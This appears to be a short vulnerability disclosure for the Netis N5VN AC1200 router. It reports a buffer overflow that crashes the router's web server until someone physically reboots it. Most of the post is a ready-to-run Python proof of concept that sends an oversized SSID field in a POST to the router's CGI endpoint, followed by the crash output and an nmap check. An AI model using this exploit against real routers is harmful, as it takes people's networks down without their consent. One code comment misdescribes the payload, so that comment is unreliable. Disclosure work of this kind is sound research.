Hi Guys
Overview
- There exist a buffer overflow vulnerability in Netis N5VN AC1200 router that can allow an attacker to crash the web server running on the router by sending a crafted request
- To bring back the http (webserver), a user must physically reboot the route.
Proof of Concept (Use python)
- POST request to change ssid Wireless 2.4G ('ssid': 'QQ==' * 5000)
- Successfully: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
- nmap 192.168.1.254 -p 80 80/tcp closed http
- Version: Netis N5VN AC1200 V1.0.1.1742
Python:
import requests
url = 'http://192.168.1.254/cgi-bin/skk_set.cgi'
# Authorization details are manipulated in the complete POST request (Based on your configuration)
headers = {
'Authorization': 'Digest username="admin", realm="N5VN", nonce="FAGasd12d1WAgMiAwMDoxNQWQWQyMDI0"',
'Accept': '*/*',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': 'http://192.168.1.254',
'Referer': 'http://192.168.1.254/index.htm',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
data = {
'wlanEnabled': '1',
'wlanMacAddr': 'bc:e2:04:1g:ea:b5',
'wlanMode': '0',
'wlanBand': '11',
'ssid': 'QQ==' * 5000, # This is 'A' repeated 5000 times
'broadSSID': '1',
'regDomain': '1',
'channel': '0',
'channelWidth': '0',
'encrypt': '6',
'wpaPskType': '3',
'wpaPskFormat': '0',
'wpaPsk': 'MqwdwasdsadDkqqw2321DQ==',
'rp_encrypt': '0',
'wl_base_set': 'save',
'wl_idx': '6',
'wscConfigured': '1',
'app': 'base',
'wl_link': '0'
}
try:
response = requests.post(url, headers=headers, data=data)
print(response.text)
except Exception as e:
print(f"Successfully: {e}")